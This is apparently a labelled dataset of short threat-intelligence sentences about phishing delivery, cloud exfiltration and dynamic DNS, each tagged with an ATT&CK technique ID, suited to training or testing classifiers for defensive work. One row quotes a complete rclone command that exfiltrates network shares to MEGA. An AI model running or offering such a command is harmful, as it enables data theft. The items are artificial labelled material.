text1
stringlengths
7
2.5k
labels
stringlengths
9
100
OceanSalt has been delivered via spearphishing emails with Microsoft Office attachments.
['T1566.001']
OilRig has sent spearphising emails with malicious attachments to potential victims using compromised and/or spoofed email accounts.
['T1566.001']
OutSteel has been distributed as a malicious attachment within a spearphishing email.
['T1566.001']
PLATINUM has sent spearphishing emails with attachments to victims as its primary initial access vector.
['T1566.001']
Patchwork has used spearphishing with an attachment to deliver files with exploits to initial victims.
['T1566.001']
PoetRAT was distributed via malicious Word documents.
['T1566.001']
Pony has been delivered via spearphishing attachments.
['T1566.001']
ROKRAT has been delivered via spearphishing emails that contain a malicious Hangul Office or Microsoft Word document.
['T1566.001']
RTM has been delivered via spearphishing attachments disguised as PDF documents.
['T1566.001']
RTM has used spearphishing attachments to distribute its malware.
['T1566.001']
Rancor has attached a malicious document to an email to gain initial access.
['T1566.001']
Rifdoor has been distributed in e-mails with malicious Excel or Word documents.
['T1566.001']
Sandworm Team has delivered malicious Microsoft Office attachments via spearphishing emails.
['T1566.001']
Sharpshooter has sent malicious attachments via emails to targets.
['T1566.001']
SideCopy has sent spearphishing emails with malicious hta file attachments.
['T1566.001']
Silence has sent emails with malicious DOCX, CHM, LNK and ZIP attachments.
['T1566.001']
Squirrelwaffle has been distributed via malicious Microsoft Office documents within spam emails.
['T1566.001']
TA459 has targeted victims using spearphishing emails with malicious Microsoft Word attachments.
['T1566.001']
TA505 has used spearphishing emails with malicious attachments to initially compromise victims.
['T1566.001']
TA551 has sent spearphishing attachments with password protected ZIP files.
['T1566.001']
The White Company has sent phishing emails with malicious Microsoft Word attachments to victims.
['T1566.001']
ThreatNeedle has been distributed via a malicious Word document within a spearphishing email.
['T1566.001']
Transparent Tribe has sent spearphishing e-mails with attachments to deliver malicious payloads.
['T1566.001']
TrickBot has used an email with an Excel sheet containing a malicious macro to deploy the malware
['T1566.001']
Tropic Trooper sent spearphishing emails that contained malicious Microsoft Office and fake installer file attachments.
['T1566.001']
Turla has used spearphishing emails to deliver BrainTest as a malicious attachment.
['T1566.001']
Valak has been delivered via spearphishing e-mails with password protected ZIP files.
['T1566.001']
Windshift has sent spearphishing emails with attachment to harvest credentials and deliver malware.
['T1566.001']
Wizard Spider has used spearphishing attachments to deliver Microsoft documents containing macros or PDFs containing malicious links to download either Emotet, Bokbot, TrickBot, or Bazar.
['T1566.001']
ZxxZ has been distributed via spearphishing emails, usually containing a malicious RTF or Excel attachment.
['T1566.001']
admin@338 has sent emails with malicious Microsoft Office documents attached.
['T1566.001']
AADInternals can send "consent phishing" emails containing malicious links designed to steal users’ access tokens.
['T1566.002']
APT28 sent spearphishing emails which used a URL-shortener service to masquerade as a legitimate service and to redirect targets to credential harvesting sites.
['T1566.002']
APT39 leveraged spearphishing emails with malicious links to initially compromise victims.
['T1566.002']
AppleJeus has been distributed via spearphishing link.
['T1566.002']
Bazar has been spread via emails with embedded malicious links.
['T1566.002']
BlackTech has used spearphishing e-mails with links to cloud services to deliver malware.
['T1566.002']
Bumblebee has been spread through e-mail campaigns with malicious links.
['T1566.002']
Confucius has sent malicious links to victims through email campaigns.
['T1566.002']
Dragonfly 2.0 used spearphishing with PDF attachments containing malicious links that redirected to credential harvesting websites.
['T1566.002']
During C0011, Transparent Tribe sent emails containing a malicious link to student targets in India.
['T1566.002']
During Night Dragon, threat actors sent spearphishing emails containing links to compromised websites where malware was downloaded.
['T1566.002']
During Operation Dust Storm, the threat actors sent spearphishing emails containing a malicious link.
['T1566.002']
EXOTIC LILY has relied on victims to open malicious links in e-mails for execution.
['T1566.002']
Earth Lusca has sent spearphishing emails to potential targets that contained a malicious link.
['T1566.002']
Elderwood has delivered zero-day exploits and malware to victims via targeted emails containing a link to malicious content hosted on an uncommon Web server.
['T1566.002']
Ember Bear has sent spearphishing emails containing malicious links.
['T1566.002']
FIN7 has conducted broad phishing campaigns using malicious links.
['T1566.002']
Hancitor has been delivered via phishing emails which contained malicious links.
['T1566.002']
Javali has been delivered via malicious links embedded in e-mails.
['T1566.002']
KOCTOPUS has been distributed as a malicious link within an email.
['T1566.002']
Kimsuky has sent spearphishing emails containing a link to a document that contained malicious macros or took the victim to an actor-controlled domain.
['T1566.002']
Lazarus Group has sent malicious links to victims via email.
['T1566.002']
LazyScripter has used spam emails that contain a link that redirects the victim to download a malicious document.
['T1566.002']
Leviathan has sent spearphishing emails with links, often using a fraudulent lookalike domain and stolen branding.
['T1566.002']
Magic Hound has sent malicious URL links through email to victims. In some cases the URLs were shortened or linked to Word documents with malicious macros that executed PowerShells scripts to download Pupy.
['T1566.002']
Melcoz has been spread through malicious links embedded in e-mails.
['T1566.002']
Mofang delivered spearphishing emails with malicious links included.
['T1566.002']
Night Dragon sent spearphishing emails containing links to compromised websites where malware was downloaded.
['T1566.002']
OutSteel has been distributed through malicious links contained within spearphishing emails.
['T1566.002']
QakBot has spread through emails with malicious links.
['T1566.002']
Saint Bot has been distributed through malicious links contained within spearphishing emails.
['T1566.002']
Sidewinder has sent e-mails with malicious links often crafted for specific targets.
['T1566.002']
Squirrelwaffle has been distributed through phishing emails containing a malicious URL.
['T1566.002']
Stolen Pencil sent spearphishing emails containing links to domains controlled by the threat actor.
['T1566.002']
TA505 has sent spearphishing emails containing malicious links.
['T1566.002']
TrickBot has been delivered via malicious links in phishing e-mails.
['T1566.002']
Turla attempted to trick targets into clicking on a link featuring a seemingly legitimate domain from Adobe.com to download their malware and gain initial access.
['T1566.002']
Windshift has sent spearphishing emails with links to harvest credentials and deliver malware.
['T1566.002']
ZIRCONIUM has used malicious links and web beacons in e-mails for malware download and to track hits to attacker-controlled URL's.
['T1566.002']
APT29 has used the legitimate mailing service Constant Contact to send phishing e-mails.
['T1566.003']
Ajax Security Team has used various social media channels to spearphish victims.
['T1566.003']
FIN6 has used fake job advertisements sent via LinkedIn to spearphish targets.
['T1566.003']
Lazarus Group has used fake job advertisements sent via LinkedIn to spearphish victims.
['T1566.003']
Lazarus Group has used social media platforms, including LinkedIn and Twitter, to send spearphishing messages.
['T1566.003']
Magic Hound used various social media channels (such as LinkedIn) as well as messaging services (such as WhatsApp) to spearphish victims.
['T1566.003']
OilRig has used LinkedIn to send spearphishing links.
['T1566.003']
APT28 can exfiltrate data over Google Drive.
['T1567']
AppleSeed has exfiltrated files using web services.
['T1567']
DropBook has used legitimate web services to exfiltrate data.
['T1567']
BoomBox can upload data to dedicated per-victim folders in Dropbox.
['T1567.002']
Chimera has exfiltrated stolen data to OneDrive accounts.
['T1567.002']
Clambling can send files from a victim's machine to Dropbox.
['T1567.002']
Confucius has exfiltrated victim data to cloud storage service accounts.
['T1567.002']
CreepyDrive can use cloud services including OneDrive for data exfiltration.
['T1567.002']
During C0015, the threat actors exfiltrated files and sensitive data to the MEGA cloud storage site using the Rclone command `rclone.exe copy --max-age 2y "\\SERVER\Shares" Mega:DATA -q --ignore-existing --auto-confirm --multi-thread-streams 7 --transfers 7 --bwlimit 10M`.
['T1567.002']
Earth Lusca has used the megacmd tool to upload stolen files from a victim network to MEGA.
['T1567.002']
Empire can use Dropbox for data exfiltration.
['T1567.002']
FIN7 has exfiltrated stolen data to the MEGA file sharing site.
['T1567.002']
HEXANE has used cloud services, including OneDrive, for data exfiltration.
['T1567.002']
Lazarus Group has exfiltrated stolen data to Dropbox using a customized version of dbxcli.
['T1567.002']
Leviathan has used an uploader known as LUNCHMONEY that can exfiltrate files to Dropbox.
['T1567.002']
POLONIUM has exfiltrated stolen data to POLONIUM-owned OneDrive and Dropbox accounts.
['T1567.002']
ROKRAT can send collected data to cloud storage services such as PCloud.
['T1567.002']
RainyDay can use a file exfiltration tool to upload specific files to Dropbox.
['T1567.002']
Rclone can exfiltrate data to cloud storage services such as Dropbox, Google Drive, Amazon S3, and MEGA.
['T1567.002']
Turla has used WebDAV to upload stolen USB files to a cloud drive. Turla has also exfiltrated stolen files to OneDrive and 4shared.
['T1567.002']
ZIRCONIUM has exfiltrated stolen data to Dropbox.
['T1567.002']
APT29 used dynamic DNS resolution to construct and resolve to randomly-generated subdomains for C2.
['T1568']
Bisonal has used a dynamic DNS service for C2.
['T1568']